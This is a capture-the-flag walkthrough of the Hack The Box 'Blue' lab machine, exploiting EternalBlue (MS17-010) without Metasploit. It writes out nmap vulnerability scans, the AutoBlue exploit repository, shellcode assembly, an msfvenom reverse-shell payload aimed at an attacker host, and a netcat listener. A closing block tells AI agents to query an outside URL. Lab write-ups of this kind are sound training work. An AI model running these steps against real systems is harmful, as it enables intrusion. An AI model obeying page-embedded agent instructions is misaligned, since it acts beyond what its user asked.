# Hack The Box - Blue Walkthrough without Metasploit

![Blue](/files/-MPKRepo9OwTxKOqeqgn)

## Enumeration

To enumerate the box we will use the following nmap command:

```
nmap -sC -sV -A 10.10.10.40
```

![Blue Enumeration](/files/-MPKW4sYvaLzqsfcVOMH)

As we can see we have the port 445 (SMB) open, it even disclose some important information **Windows 7 professional 7601 Service Pack 1**, lets run a new enumeration, this time with vulnerability scripts:

We will be using two flags:

\--script: This flag will be used to apply "vuln" (vulnerability) scripts on the given ports of the box.

-p: will scan only the ports listed, in our case 445 since its the only one we are currently interested on.

```
nmap --script vuln -p445 10.10.10.40
```

![EternalBlue Vulnerability](/files/-MPKZCmI9G1qPUvdDcUf)

Something really interesting catch our eye, **CVE-2017-0143 (MS17-010)**, with a quick google search...

### Finding the Vulnerability

{% embed url="<https://www.cvedetails.com/cve/CVE-2017-0143/>" %}

Eternal Blue exploit, with lots of Metasploit modules.. but we will not fall into the temptation of using MSF (which is a really usefull tool but not our goal here).

### Non Metasploit exploit

If we search "*a bit more*" we will find this excellent github repository:

{% embed url="<https://github.com/3ndG4me/AutoBlue-MS17-010>" %}

Let's clone this repository:

```
git clone https://github.com/3ndG4me/AutoBlue-MS17-010
```

There are several scripts in the folder, the first one we will use is eternal\_checker.py to confirm it is vulnerable:

```
python eternal_checker.py 10.10.10.40 -port 445
```

![Eternal Checker](/files/-MPKcuE9nK4pLa-pR-am)

## Exploitation

### Generate a Payload

Now we navigate to shellcode folder in order to generate our payload, this will be done in two steps:

```
nasm -f bin eternalblue_kshellcode_x64.asm -o evilKernel.bin
```

![Generating Kernel.bin](/files/-MPKenawfkpB6XZE6zuE)

And now our msfvenom payload:

```
msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f raw -o evilReverse.bin
```

![msfvenom payload](/files/-MPKfRZxy8_CaNkmNBBe)

Now we have to mix them together:

```
cat evilKernel.bin evilReverse.bin > evilPayload.bin
```

![Mixing both parts](/files/-MPKfouwrTGr6RGTCYV1)

### Executing the Exploit

First of all we need a netcat listener:

```
nc -nvlp 443
```

Now we need to decide which python script to use, with our previous enumeration we have discovered that the target OS is Windows 7

![Eternalblue\_exploit7.py](/files/-MPKihKE-4tyCNdJ_gl0)

Now in order to use the exploit we need some parameters, the **victim ip**, the **mixed payload**, and the **numGroomConn:**

![Failing attempt](/files/-MPKkTBY3DP9v804bI8Z)

This attempt failed, now we have to change the number of groom connection until we find a valid one, we can go increasing the value until that.

## Pwnd

After some tries increasing the number of groom connections we were able to get a shell as NT Authority

![After some tries](/files/-MPKkxpytR-8F5ss9ZXN)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://4st1nus.gitbook.io/hackthebox/hack-the-box-blue-walkthrough-without-metasploit.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.